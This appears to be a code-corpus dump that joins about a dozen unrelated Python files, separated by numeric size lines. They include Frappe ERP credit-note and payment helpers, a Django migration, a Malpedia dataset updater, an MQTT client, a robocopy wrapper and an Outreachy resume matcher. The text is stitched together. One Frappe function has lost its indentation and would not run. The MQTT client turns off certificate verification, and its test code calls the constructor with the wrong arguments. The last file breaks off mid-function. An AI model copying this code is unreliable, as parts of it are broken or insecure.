    # RG - Customers with currency != MXN may only transact in their native currency (e.g. USD).
    # RG - Customers without default_currency, or with MXN, may transact in any currency.
    # RG - Payment Entries derived from automatic discounts must NOT be stamped (timbrar).
    pii.paid_amount = float(doc.total) * float(doc.conversion_rate)
    pii.source_exchange_rate = 1
    pii.target_exchange_rate = 1
    pii.received_amount = float(doc.total) * float(doc.conversion_rate)
    company = frappe.get_doc('Company', pii.company)
    pii.paid_to = '102.01 - Bancos nacionales - ' + company.abbr
    # One reference row per substituted Sales Invoice, converted at the note's rate.
    for i in doc.si_sustitucion:
        pii.append('references', {
            'reference_doctype': 'Sales Invoice',
            'reference_name': i.sales_invoice,
            'allocated_amount': float(i.valor) * float(doc.conversion_rate),
            'pagado': float(i.valor) * float(doc.conversion_rate),  # change made by Santiago
        })
    pii.flags.ignore_permissions = True
    pii.flags.ignore_mandatory = True
    frappe.errprint(pii.party)
    frappe.errprint(pii.paid_to)
    pii.submit()
    # Link the Payment Entry back to the credit note (DB value + in-memory doc).
    frappe.db.set_value("CFDI Nota de Credito", name, 'pago', pii.name)
    doc.pago = pii.name
    frappe.msgprint('Devolucion monetaria generada : ' + '<a href="#Form/Payment Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>' )
    doc.reload()
@frappe.whitelist()
def create_stock_entry(name):
    """For a 'Devolucion' CFDI credit note, submit a Material Receipt Stock Entry
    returning each line item to its warehouse."""
    doc = frappe.get_doc('CFDI Nota de Credito',name)
    if doc.tipo_de_factura == "Devolucion":
        pii = frappe.new_doc("Stock Entry")
        pii.stock_entry_type = "Material Receipt"
        pii.naming_series = "STE-"
        for i in doc.items:
            pii.append('items', {
                'item_code': i.item_code,
                'qty': i.qty,
                'uom': i.stock_uom,
                't_warehouse': i.warehouse,
            })
        pii.flags.ignore_permissions = True
        pii.submit()
        frappe.msgprint('Devolucion de Inventario generada : ' + '<a href="#Form/Stock Entry/' + pii.name + '"target="_blank">' + pii.name + '</a>' )
    frappe.errprint('HECHO')
# RG - Cancel the Payment Entry linked to a CFDI credit note.
@frappe.whitelist()
def cancelar_pago(name):
    """Cancel the Payment Entry referenced by the credit note's `pago` field."""
    doc = frappe.get_doc('CFDI Nota de Credito', name)
    pii = frappe.get_doc('Payment Entry', doc.pago)
    pii.cancel()
@frappe.whitelist()
def quitar_tags_item_description():
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<div><p>',''))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'</p><p>',' '))""")
frappe.db.sql("""update `tabSales Invoice Item` set description = (replace(description,'<br>',''))""")
frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""")
frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p></div>',''))""")
frappe.db.sql("""update `tabDelivery Note Item` set description = (replace(description,'</p><p>',' '))""")
frappe.errprint('Tags Eliminados')
@frappe.whitelist()
def quitar_tags_item():
    """Strip rich-text HTML tags out of Quotation and Sales Order item
    descriptions, executing the statements in the original order."""
    statements = (
        """update `tabQuotation Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""",
        """update `tabQuotation Item` set description = (replace(description,'</p></div>',''))""",
        """update `tabQuotation Item` set description = (replace(description,'</p><p>',' '))""",
        """update `tabQuotation Item` set description = (replace(description,'<div><p>',' '))""",
        """update `tabQuotation Item` set description = (replace(description,'<br>',' '))""",
        """update `tabQuotation Item` set description = (replace(description,'<strong>',' '))""",
        """update `tabQuotation Item` set description = (replace(description,'</strong>',' '))""",
        """update `tabSales Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""",
        """update `tabSales Order Item` set description = (replace(description,'</p></div>',''))""",
        """update `tabSales Order Item` set description = (replace(description,'</p><p>',' '))""",
    )
    for statement in statements:
        frappe.db.sql(statement)
@frappe.whitelist()
def quitar_tags():
    """Strip rich-text HTML tags out of Purchase Order item descriptions,
    executing the statements in the original order."""
    statements = (
        """update `tabPurchase Order Item` set description = (replace(description,'<div class="ql-editor read-mode"><p>',''))""",
        """update `tabPurchase Order Item` set description = (replace(description,'</p></div>',''))""",
        """update `tabPurchase Order Item` set description = (replace(description,'</p><p>',' '))""",
        """update `tabPurchase Order Item` set description = (replace(description,'<strong>',' '))""",
        """update `tabPurchase Order Item` set description = (replace(description,'</strong><strong>',' '))""",
    )
    for statement in statements:
        frappe.db.sql(statement)
@frappe.whitelist()
def get_chart_data():
    """Build an axis-mixed chart payload: monthly PPD credit-sales totals
    (bar series) alongside monthly received payments (line series).

    Labels come from the sales series; the payment series is assumed to line
    up with the same months.
    """
    sales_query = """SELECT str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `posting_date`, sum(`tabSales Invoice`.`base_grand_total`) AS `sum`
    FROM `tabSales Invoice`
    WHERE (`tabSales Invoice`.`docstatus` = 1
    AND `tabSales Invoice`.`metodo_pago` = 'PPD' AND DATE(`tabSales Invoice`.`posting_date`) >= '2021-04-01')
    GROUP BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d')
    ORDER BY str_to_date(concat(date_format(`tabSales Invoice`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC
    """
    sales_rows = frappe.db.sql(sales_query, as_list=1)
    labels = [row[0] for row in sales_rows]
    sales_totals = [row[1] for row in sales_rows]

    payments_query = """SELECT str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') AS `creation`, sum(`tabPayment Entry`.`paid_amount`) AS `sum`
    FROM `tabPayment Entry`
    WHERE `tabPayment Entry`.`docstatus` = 1 AND `tabPayment Entry`.`payment_type` = 'Receive'
    GROUP BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d')
    ORDER BY str_to_date(concat(date_format(`tabPayment Entry`.`posting_date`, '%Y-%m'), '-01'), '%Y-%m-%d') ASC
    """
    payment_rows = frappe.db.sql(payments_query, as_list=1)
    payment_totals = [row[1] for row in payment_rows]

    return {
        "labels": labels,
        "datasets": [
            {
                "name": _("Ventas a Credito"),
                "values": sales_totals,
                "chartType": 'bar',
            },
            {
                "name": _("Pagos"),
                "values": payment_totals,
                "chartType": 'line',
            },
        ],
        "type": "axis-mixed",
    }
@frappe.whitelist()
def pi_monto_pendiente(name):
    """Initialize monto_pendiente on a Purchase Invoice to its grand total."""
    invoice = frappe.get_doc('Purchase Invoice', name)
    frappe.db.set_value('Purchase Invoice', name, 'monto_pendiente', invoice.grand_total)
@frappe.whitelist()
def pago_proveedor_usd(name):
    # For company 'Sillas and Chairs' only: write the payment's paid_amount into
    # the monto_pendiente field of the Purchase Invoices referenced by this
    # Payment Entry.
    pe = frappe.get_doc('Payment Entry',name)
    if pe.company == 'Sillas and Chairs':
        per = frappe.get_list('Payment Entry Reference', filters={
            'parent': pe.name})
        for r in per:
            # NOTE(review): `r` is a row dict returned by get_list, not the
            # referenced invoice's name — passing it as the document name here
            # looks wrong; presumably r.reference_name was intended. Also each
            # referenced invoice receives the FULL paid_amount rather than its
            # allocated amount — confirm intent.
            frappe.db.set_value("Purchase Invoice",r, 'monto_pendiente', pe.paid_amount)
@frappe.whitelist()
def restore_monto_pendiente(name):
    """Restore monto_pendiente on every Sales Invoice referenced by the given
    Payment Entry, echoing each invoice name and amount for debugging."""
    payment = frappe.get_doc('Payment Entry', name)
    for ref in payment.references:
        frappe.db.set_value('Sales Invoice', ref.reference_name, 'monto_pendiente', ref.monto_pendiente)
        frappe.errprint(ref.reference_name)
        frappe.errprint(ref.monto_pendiente)
@frappe.whitelist()
def clave(name):
    # Assign the next sequential customer key ("clave") when the customer has none.
    # NOTE(review): frappe.db.sql returns rows (e.g. ((5,),)), so `numero` is not
    # a bare integer here; confirm whether set_value coerces that or whether
    # numero[0][0] was intended.
    numero = frappe.db.sql("""SELECT max(clave) + 1 as "clave" from `tabCustomer` ORDER BY creation desc """)
    c = frappe.get_doc('Customer', name)
    if c.clave is None:
        frappe.db.set_value("Customer", c.name, 'clave', numero)
    # frappe.db.sql("""UPDATE `tabCustomer` set cuenta_sat = CONCAT('110410', clave) WHERE cuenta_sat IS null """)
| 24,908 | 9,438 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: drops the `user` foreign-key column from Video."""

    def forwards(self, orm):
        # Deleting field 'Video.user'
        db.delete_column('videos_video', 'user_id')

    def backwards(self, orm):
        # User chose to not deal with backwards NULL issues for 'Video.user'
        raise RuntimeError("Cannot reverse this migration. 'Video.user' and its values cannot be restored.")

    # Frozen ORM snapshot South uses while replaying this migration; do not edit.
    models = {
        'videos.award': {
            'Meta': {'object_name': 'Award'},
            'award_type': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'category': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'preview': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
            'region': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
            'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['videos.Video']", 'null': 'True', 'blank': 'True'})
        },
        'videos.video': {
            'Meta': {'object_name': 'Video'},
            'bitly_link_db': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
            'category': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2012, 2, 28, 0, 0)', 'auto_now_add': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'judge_mark': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'region': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'shortlink': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
            'state': ('django.db.models.fields.CharField', [], {'default': "'unsent'", 'max_length': '10'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'upload_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200'}),
            'user_country': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'user_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'}),
            'views': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
            'votes': ('django.db.models.fields.BigIntegerField', [], {'default': '0'})
        }
    }

    complete_apps = ['videos']
import re
import os
import sys
import requests
try:
    import config
# Only a missing/broken config module should trigger the guidance message; the
# original bare "except:" also swallowed SystemExit and KeyboardInterrupt.
except ImportError:
    print("create a config.py based on template.config.py and set your Malpedia API token!")
    sys.exit()
def delete_existing_dbs():
    """Delete any previously downloaded ApiVector DB files from dbs/."""
    db_name = re.compile(r"\d{4}-\d\d-\d\d-apivectors-v\d+\.csv")
    for entry in os.listdir("dbs"):
        if db_name.search(entry):
            os.remove("dbs" + os.sep + entry)
def get_newest_db_version():
    """Return the highest ApiVector DB version found in dbs/, or 0 if none."""
    versions = [0]
    for entry in os.listdir("dbs"):
        found = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", entry)
        if found:
            versions.append(int(found.group("version_number")))
    return max(versions)
def download_apivector_db():
    """Fetch the latest ApiVector DB CSV from Malpedia.

    Returns a dict with keys:
      filename: server-provided file name ("" on failure)
      content:  CSV payload text ("" on failure)
      version:  integer version parsed from the filename (0 on failure)
    """
    result = {
        "filename": "",
        "content": "",
        "version": 0
    }
    response = requests.get(
        'https://malpedia.caad.fkie.fraunhofer.de/api/list/apiscout/csv',
        headers={'Authorization': 'apitoken ' + config.APITOKEN},
    )
    if response.status_code == 200:
        # NOTE(review): assumes a 'Content-Disposition: ...=<filename>' header
        # without surrounding quotes — confirm against the API.
        result["filename"] = response.headers['Content-Disposition'].split("=")[1].strip()
        result["content"] = response.text
        version = re.search(r"\d{4}-\d\d-\d\d-apivectors-v(?P<version_number>\d+)\.csv", result["filename"])
        # BUG FIX: the re.Match object (or None) used to be stored here, while
        # "version" is initialized to 0 and compared against the int returned by
        # get_newest_db_version(). Store the parsed integer instead.
        if version:
            result["version"] = int(version.group("version_number"))
    else:
        print("Failed to download ApiVector DB, response code: ", response.status_code)
    return result
def check_malpedia_version():
    """Query Malpedia for its current content version; return 0 on failure."""
    response = requests.get(
        'https://malpedia.caad.fkie.fraunhofer.de/api/get/version'
    )
    if response.status_code != 200:
        print("Failed to check Malpedia version, response code: ", response.status_code)
        return 0
    return response.json()["version"]
def main():
    """Download a newer ApiVector DB when Malpedia has one; otherwise report
    that the local copy is current."""
    local_version = get_newest_db_version()
    remote_version = check_malpedia_version()
    if local_version >= remote_version:
        print("Your ApiVector DB is the most recent ({})".format(remote_version))
        return
    update = download_apivector_db()
    if not update["version"]:
        print("ApiVector update download failed.")
        return
    # Replace all old DB files with the freshly downloaded one.
    delete_existing_dbs()
    update_db_path = "dbs" + os.sep + update["filename"]
    with open(update_db_path, "w") as fout:
        fout.write(update["content"])
    print("Downloaded and stored ApiVector DB file: ", update_db_path)


if __name__ == "__main__":
    # main() returns None, so the process exit status is 0.
    sys.exit(main())
| 2,701 | 858 |
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2003 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
class Declaration:
    """Base class for parsed declarations; remembers where in the source the
    declaration was found."""

    def __init__(self, locator):
        # locator is expected to expose .filename, .line and .column, or be falsy.
        self.locator = locator
        return

    def __str__(self):
        if not self.locator:
            return "source=<unknown>"
        where = self.locator
        return "source='%s', line=%d, column=%d" % (where.filename, where.line, where.column)
# version
__id__ = "$Id$"
# End of file
| 752 | 221 |
from .mode import Mode
from .document import Document
# Class-level default: the last string entered through a Prompt is stored on
# Document itself, so it starts out empty for every document.
Document.promptinput = ''
class Prompt(Mode):
    """Modal input mode that collects a line of text from the user.

    Printable keys are accumulated into an input buffer; Enter commits the
    buffer to document.promptinput, Cancel discards it. Entering and leaving
    the mode both fire the document's OnPrompt event.
    """

    def __init__(self, document, callback=None):
        Mode.__init__(self, document, callback)
        self.inputstring = ''
        self.start(document)

    def processinput(self, document, userinput):
        if not isinstance(userinput, str):
            raise NotImplementedError('To be done.')
        key = userinput
        if key == 'Cancel':
            self.stop(document)
        elif key == '\n':
            # Commit the collected text and leave the mode.
            document.promptinput = self.inputstring
            self.stop(document)
        elif len(key) > 1:
            # Other named keys are not supported; ignore them.
            pass
        else:
            self.inputstring += key

    def start(self, doc):
        Mode.start(self, doc)
        doc.OnPrompt.fire(doc)

    def stop(self, doc):
        Mode.stop(self, doc)
        doc.OnPrompt.fire(doc)
def prompt(promptstring='>'):
    """Constructor for the prompt mode.

    Returns a Prompt subclass whose instances carry *promptstring*.
    """
    class PromptWithString(Prompt):
        def __init__(self, document, callback=None):
            # Set the prompt string BEFORE Prompt.__init__ runs: that call
            # invokes self.start(document), which fires doc.OnPrompt, and event
            # handlers may read self.promptstring at that point. The original
            # assigned it only after the event had already fired.
            self.promptstring = promptstring
            Prompt.__init__(self, document, callback)
    return PromptWithString
| 1,242 | 337 |
from lamson import queue
def attach_headers(message, user_id, post_name, domain):
    """Stamp routing headers onto *message*; the index.py handler reads them
    later to decide where the message finally goes."""
    routing = {
        'X-Post-Name': post_name,
        'X-Post-User-ID': user_id,
        'X-Post-Domain': domain,
    }
    for header, value in routing.items():
        message[header] = value
def defer_to_queue(message):
    # Push the message onto the on-disk maildir queue consumed later by the
    # index.py handler. (Python 2 file — note the print statement below;
    # "dever" in the output string looks like a typo for "defer".)
    index_q = queue.Queue("run/posts") # use a diff queue?
    index_q.push(message)
    print "run/posts count after dever", index_q.count()
| 482 | 157 |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf2jax."""
from absl.testing import absltest
from absl.testing import parameterized
import jax.numpy as jnp
import numpy as np
import tensorflow as tf
from tf2jax._src import numpy_compat
# Every TensorFlow dtype that the tf->numpy / tf->jax.numpy conversion tables
# are expected to cover, one entry per table key.
_dtypes = [
    tf.bool, tf.uint8, tf.uint16, tf.uint32, tf.uint64, tf.int8, tf.int16,
    tf.int32, tf.int64, tf.bfloat16, tf.float16, tf.float32, tf.float64,
    tf.complex64, tf.complex128
]
class NumpyCompatTest(parameterized.TestCase):
    """Checks the tf->np and tf->jnp dtype tables are complete and correct."""

    @parameterized.named_parameters(
        ("np", np, numpy_compat.tf_to_np_dtypes),
        ("jnp", jnp, numpy_compat.tf_to_jnp_dtypes),
    )
    def test_dtype_conversion(self, np_module, dtype_map):
        # The table must cover exactly the dtypes listed in _dtypes.
        self.assertEqual(len(_dtypes), len(dtype_map))
        for src in _dtypes:
            # numpy spells boolean "bool_"; every other name matches TF's.
            target_name = "bool_" if src.name == "bool" else src.name
            if src.name == "bfloat16":
                # bfloat16 only exists in jax.numpy, so both tables map to it.
                self.assertIs(dtype_map[src], jnp.bfloat16)
            else:
                self.assertIs(dtype_map[src], getattr(np_module, target_name))


if __name__ == "__main__":
    absltest.main()
| 1,677 | 572 |
import paho.mqtt.client as mqtt
import ssl
import redis
import time
class MQTT_CLIENT(object):
    """Synchronous facade over paho-mqtt: TLS connect with credentials pulled
    from redis, plus a blocking publish() that waits for the broker's ack."""
    def __init__(self,redis_site_data,server,port,user_name,password_key):
        self.server = server
        self.port = port
        self.redis_site_data = redis_site_data
        # Empty client_id + clean_session=True: the broker assigns a fresh session.
        self.client = mqtt.Client(client_id="", clean_session=True, userdata=None, transport="tcp")
        # NOTE(review): hard-coded client certificate paths and CERT_NONE (no
        # server certificate verification) — confirm this is intended.
        self.client.tls_set(certfile= "/home/pi/mosquitto/certs/client.crt", keyfile= "/home/pi/mosquitto/certs/client.key", cert_reqs=ssl.CERT_NONE )
        # The MQTT password lives in a redis hash: hget(password_key, user_name).
        redis_handle_pw = redis.StrictRedis(redis_site_data["host"],
                              redis_site_data["port"],
                              db=redis_site_data["redis_password_db"],
                              decode_responses=True)
        self.client.username_pw_set(user_name, redis_handle_pw.hget(password_key,user_name))
        self.client.on_connect = self.on_connect
        self.client.on_publish = self.on_publish
    def connect(self):
        # Start the network loop, then poll up to ~5s (50 * 0.1s) until
        # on_connect() has recorded rc == 0. Returns True on success.
        self.rc = -1
        self.client.connect(self.server, self.port, 60)
        self.client.loop_start()
        for i in range(0,50):
            time.sleep(.1)
            if self.rc == 0:
                return True
        return False
    def loop(self,time):
        # NOTE(review): the parameter shadows the module-level `time` import.
        self.client.loop(time)
    def on_connect(self,client, userdata, flags, rc):
        # paho callback: record the connect result code for connect() to poll.
        print("on connect",flags,rc)
        self.rc = rc
        #self.client.loop_stop()
    def on_publish(self, client, userdata, mid):
        # paho callback: flag that the broker acknowledged message `mid`.
        self.callback_flag = True
        self.mid_server = mid
    def disconnect(self):
        self.client.disconnect()
        self.client.loop_stop()
    def publish(self,topic,payload=None,qos=0,retain=False):
        # Blocking publish. Returns (ok, code): (True, 0) when the broker acked
        # the matching message id; (False, -1) publish call failed;
        # (False, -2) ack arrived for a different mid; (False, -3) ~5s timeout.
        self.callback_flag = False
        self.mid_server = -1
        self.client_result ,self.mid_client = self.client.publish(topic, payload, qos, retain)
        if self.client_result != 0:
            return False,-1
        self.client.loop(5)
        for i in range(0,50):
            time.sleep(.1)
            if self.callback_flag == True:
                if (self.mid_server == self.mid_client):
                    return True ,0
                else:
                    return False , -2
        return False,-3
if __name__ == "__main__":
    # Manual smoke test: load redis connection data and publish one reading.
    import json
    import time
    file_handle = open("../system_data_files/redis_server.json",'r')
    data = file_handle.read()
    file_handle.close()
    redis_site_data = json.loads(data)
    # NOTE(review): MQTT_CLIENT.__init__ takes (redis_site_data, server, port,
    # user_name, password_key); this call passes only one argument and will
    # raise TypeError — the smoke test appears out of date with the class.
    mqtt_client = MQTT_CLIENT(redis_site_data)
    print(mqtt_client.connect())
    print("starting to publish")
    print(mqtt_client.publish("REMOTES/SLAVE:1/TEMPERATURE:Case",72))
    # Busy-wait keeps the process (and the paho loop thread) alive; it spins
    # at 100% on one core.
    while True:
        pass
| 2,918 | 982 |
__author__ = 'Ralph'
import pandas as pd
from base import Node
from base import InputPort
from base import OutputPort
class Filter(Node):
    """Abstract pipeline node with one DataFrame input and one DataFrame output."""

    def __init__(self, name):
        super(Filter, self).__init__(name)
        self.add_input_port(InputPort(name='input', data_type=pd.DataFrame))
        self.add_output_port(OutputPort(name='output', data_type=pd.DataFrame))

    def execute(self):
        # Concrete filters must override this.
        raise RuntimeError('Not implemented')
class FilterExamples(Filter):
    """Pass-through filter; requires a 'filter_type' config item, of which only
    'all' is currently defined."""

    def __init__(self):
        super(FilterExamples, self).__init__('FilterExamples')
        self.set_required_config_items(['filter_type'])
        self._filter_types = ['all']

    def execute(self):
        self.check_config()
        frame = self.get_input_port('input').get_data()
        if frame is None:
            # Nothing upstream yet; leave the output untouched.
            return
        self.get_output_port('output').set_data(frame)
class FilterExampleRange(Filter):
    # TODO: stub — not implemented (name suggests range-based filtering; confirm).
    pass
class RemoveDuplicates(Filter):
    # TODO: stub — not implemented (name suggests duplicate-row removal; confirm).
    pass
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# Shared SQLAlchemy handle; bound to the application inside create_app().
db = SQLAlchemy()
def create_app(debug=False):
    """Application factory for the Delphi REST API."""
    # Imported here to avoid a circular import with the blueprint module.
    from delphi.apps.rest_api.api import bp

    app = Flask(__name__)
    app.config.from_object("delphi.apps.rest_api.config")
    app.debug = debug
    db.init_app(app)
    app.register_blueprint(bp)
    return app
| 329 | 120 |
import os
import subprocess
from dataclasses import dataclass
from pathlib import WindowsPath
from time import sleep
from typing import Optional, Sequence
from click import ClickException
from rich.progress import Progress
import rob.console as con
import rob.filesystem
@dataclass
class RobocopyResults:
    """Sections parsed out of robocopy's console report."""
    options: list[str]
    # Using Sequence because "list" and other mutable container types are
    # considered "invariant", so the contained type needs to match exactly.
    # https://github.com/microsoft/pyright/issues/130
    errors: Sequence[Optional[str]]
    stats: Sequence[Optional[str]]


def parse_robocopy_output(
    output: str,
) -> RobocopyResults:
    """Split robocopy's console output into options, errors and stats sections."""
    lines = [line for line in output.split("\n") if line]
    # Robocopy separates report sections with 78/79-char dashed rules; a
    # 50-dash substring is enough to recognize them.
    dividers = [idx for idx, line in enumerate(lines) if "-" * 50 in line]
    options = lines[dividers[1] + 1 : dividers[2]]
    if len(dividers) == 3:
        # No statistics section: everything after the third rule is errors.
        errors = lines[dividers[2] + 1 :]
        stats = []
    else:
        errors = lines[dividers[2] + 1 : dividers[3]]
        stats = lines[dividers[3] + 1 :]
    return RobocopyResults(
        options=options,
        errors=errors,
        stats=stats,
    )
def run_robocopy(
    source: WindowsPath,
    target: WindowsPath,
    dir_size_bytes: Optional[int] = None,
    dry_run: bool = False,
    copy_permissions: bool = False,
    quiet=False,
) -> None:
    """Copy *source* into *target* with Windows robocopy, showing progress.

    Raises ClickException when the target already exists, when robocopy
    reports errors, or when the copied size does not match the source size.
    """
    msg = f"Copying data from {con.style_path(source)} to {con.style_path(target)}"
    if not dir_size_bytes:
        dir_size_bytes = rob.filesystem.get_dir_size(source)
    if target.exists():
        con.print_(msg)
        # BUG FIX: the original message lacked the f-prefix and printed the
        # literal text "{target} already exists" instead of the actual path.
        raise ClickException(f"{target} already exists")
    if dry_run:
        con.print_(msg, end="")
        con.print_skipped()
        return
    if not quiet:
        con.print_(msg)
    robocopy_exe = (
        WindowsPath(os.environ["SystemRoot"])
        .joinpath("system32/robocopy.exe")
        .resolve()
    )
    robocopy_args = [
        str(robocopy_exe),
        str(source),
        str(target),
        "/E",  # copy subdirectories, including Empty ones.
        "/MT",  # Do multi-threaded copies with n threads (default 8).
        "/R:0",  # number of Retries on failed copies: default 1 million.
        "/NDL",  # No Directory List - don't log directory names.
        "/NFL",  # No File List - don't log file names.
        "/NP",  # No Progress - don't display percentage copied.
    ]
    if copy_permissions:
        robocopy_args.append(
            # /COPY flags: D=Data, A=Attributes, T=Timestamps, X=Skip alt data streams,
            # S=Security=NTFS ACLs, O=Owner info, U=aUditing info
            "/COPY:DATSO"
        )
    proc = subprocess.Popen(
        args=robocopy_args,
        stdout=subprocess.PIPE,
        # stderr included for completeness, robocopy doesn't seem to use it
        stderr=subprocess.STDOUT,
        text=True,
    )
    while proc.poll() is None:
        # "is None" so that returncode 0 breaks loop
        # 0: No errors occurred, and no copying was done.
        # The source and destination directory trees are completely synchronized.
        # 1: One or more files were copied successfully (that is, new files have arrived).
        # https://ss64.com/nt/robocopy-exit.html
        if not quiet:
            with Progress(auto_refresh=False, transient=True) as progress:
                task_id = progress.add_task(
                    "[green]Copying data...[/green]", total=dir_size_bytes
                )
                # Approximate progress by the target directory's current size.
                progress.update(task_id, completed=rob.filesystem.get_dir_size(target))
                progress.refresh()
        sleep(2)
    output = proc.stdout.read()  # type: ignore
    # Exit code cannot be trusted as, for example, this error:
    # ERROR 5 (0x00000005) Copying NTFS Security to Destination Directory
    # ...can be present despite returncode 0, so let's look for errors ourselves
    robocopy_results = parse_robocopy_output(output)
    if robocopy_results.errors:
        raise ClickException(f"Robocopy: {str(robocopy_results.errors)}")
    if dir_size_bytes != rob.filesystem.get_dir_size(target):
        raise ClickException("Source and target folder sizes do not match. Aborting.")
    if not quiet:
        con.print_("[green]Data copy complete[/green]")
| 4,524 | 1,385 |
#!/usr/bin/env python3
#
# Copyright 2017 Sarah Sharp <sharp@otter.technology>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# This script attempts to match skillset keywords in resumes with
# Outreachy projects. The skillset keyword lists are based on the
# Outreachy project list at:
# https://wiki.gnome.org/Outreachy/2017/MayAugust
#
# This program expects you to have created a directory with identically
# named PDF and text resume files. You can translate PDF files to text with:
# $ for i in `ls *.pdf`; do pdftotext $i; done
import argparse
import csv
import os
import re
import textwrap
#from fuzzywuzzy import fuzz
from enum import Enum
from collections import Counter
from shutil import copyfile
class outreachyProject:
    """Outreachy project name, description, keywords, and matching resume storage."""

    def __init__(self, name, short, description, keywords, printskip):
        # Static project data supplied by the projectsMay2017 table.
        self.name = name
        self.short = short
        self.description = description
        self.keywords = keywords
        self.printskip = printskip
        # Filled in by matchResumes() as resumes are scored.
        self.strongResumeMatches = []
        self.weakResumeMatches = []
class resumeFile:
    """Information relating to a text and pdf resume pair."""

    def __init__(self, path, textFileName, contents):
        self.path = path
        self.textFileName = textFileName
        # The PDF is assumed to sit next to the text extraction, same basename.
        self.pdfFileName = os.path.splitext(textFileName)[0] + '.pdf'
        self.contents = contents
        # Extract candidate email addresses. BUG FIX: the original class
        # [\w\.-\_\+] contained the unintended range ".-\_" (0x2E-0x5F), which
        # silently matched characters such as '/', ':' and '<' into the local
        # part; this class matches only word chars, dots, pluses and hyphens.
        self.emails = re.findall(r'[\w.+-]+@[\w.-]+', contents)
        # Filled in by matchResumes() as projects are scored.
        self.strongProjectMatches = []
        self.weakProjectMatches = []
def readResumeFiles(directory):
    """Load every extracted-text resume in *directory* into resumeFile objects.

    Skips '-email.txt' / '-email-tam.txt' companion files, then reports any
    first-listed email address shared by more than one resume.
    """
    resumeFiles = []
    for f in [l for l in os.listdir(directory) if l.endswith('.txt') and
            not l.endswith('-email.txt') and
            not l.endswith('-email-tam.txt')]:
        with open(os.path.join(directory, f), 'r') as resume:
            contents = resume.read()
            resumeFiles.append(resumeFile(directory, f, contents))
    #print("Found", len(resumeFiles), "resume files")
    for r in resumeFiles:
        if len(r.emails) == 0:
            continue
        # NOTE(review): `line` is assembled but never printed or used —
        # leftover from a commented-out report.
        line = r.pdfFileName
        for email in r.emails:
            line = line + ' ' + email
        line = line + ' ' + str(len(r.contents))
    # The first email is usually the actual email.
    emails = [resume.emails[0] for resume in resumeFiles if resume.emails]
